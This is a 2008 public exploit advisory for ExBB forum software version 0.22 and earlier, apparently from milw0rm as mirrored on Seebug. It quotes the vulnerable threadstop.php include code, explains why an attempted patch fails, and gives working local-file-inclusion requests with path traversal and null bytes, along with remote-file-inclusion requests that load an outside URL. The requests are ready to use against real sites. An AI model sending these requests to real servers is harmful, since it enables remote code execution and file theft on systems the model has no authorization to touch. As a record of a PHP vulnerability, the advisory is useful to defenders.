#====================================================================================================# # ____ __________ __ ____ __ # # /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ # # | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ # # | | | \ | |/ \ \___| | /_____/ | || | # # |___|___| /\__| /______ /\___ >__| |___||__| # # \/\______| \/ \/ # #====================================================================================================# # This is a public Exploit # #====================================================================================================# # ExBB <= 0.22 # # Multiple File Inclusion / Code Execution Vulnerability # # # #====================================#===============#====================================#==========# # Server Configuration Requirements # # Some Information # # #====================================# #====================================# # # # # # [RFI] [LFI] # Vendor: exbb.clans.it # # # Author: The:Paradox # # register_globals = 1 register_globals = 1 # Severity: Moderately Critical # # allow_url_fopen = 1 magic_quotes_gpc = 0 # # # allow_url_finculde = 1 # Proud To Be Italian. # # # # #====================================#===============#===============================================# # Proof Of Concept / Bug Explanation # # #====================================# # # Exbb presents File Inclusion Vulnerabilities. Let's have a look of the source. # # # # /modules/threadstop/threadstop.php # # # # 1. <?php # # 2. ################# PATCH by Flippo ###################### # # 3. if ((stristr($_SERVER['QUERY_STRING'], 'exbb[home_path]')) # # 4. or (stristr($_SERVER['QUERY_STRING'], "exbb['home_path']"))) { # # 5. die(); # # 6. } # # 7. ######################################################## # # 8. # # 9. include($new_exbb[home_path].'modules/threadstop/data/threadstop_data.php'); # # 10. include($exbb[home_path].'modules/threadstop/language/'.$exbb[default_lang].'/lang.php'); # # # # The patch of Filippo, is a completely useless code. # # When Register_Globals is On we can set $new_exbb[home_path] not only via GET variables, but # # also via POST and COOKIE. # # Moreover Filippo has forgot to fix $exbb[default_lang] too. # # # # Example: # # # # [LFI] # # # # GET site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../../../[File]%00 # # GET site.it/Ex/modules/threadstop/threadstop.php?exbb[default_lang]=../../../../../install.php%00 # # # # [RFI] # # # # POST site.it/Ex/modules/threadstop/threadstop.php? new_exbb[home_path]=http://www.google.it? # # POST site.it/Ex/modules/threadstop/threadstop.php? exbb[home_path]=http://www.yoursite.com/page? # # # #====================================================================================================# # Use this at your own risk. You are responsible for your own deeds. # #====================================================================================================# # milw0rm.com [2008-04-08]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论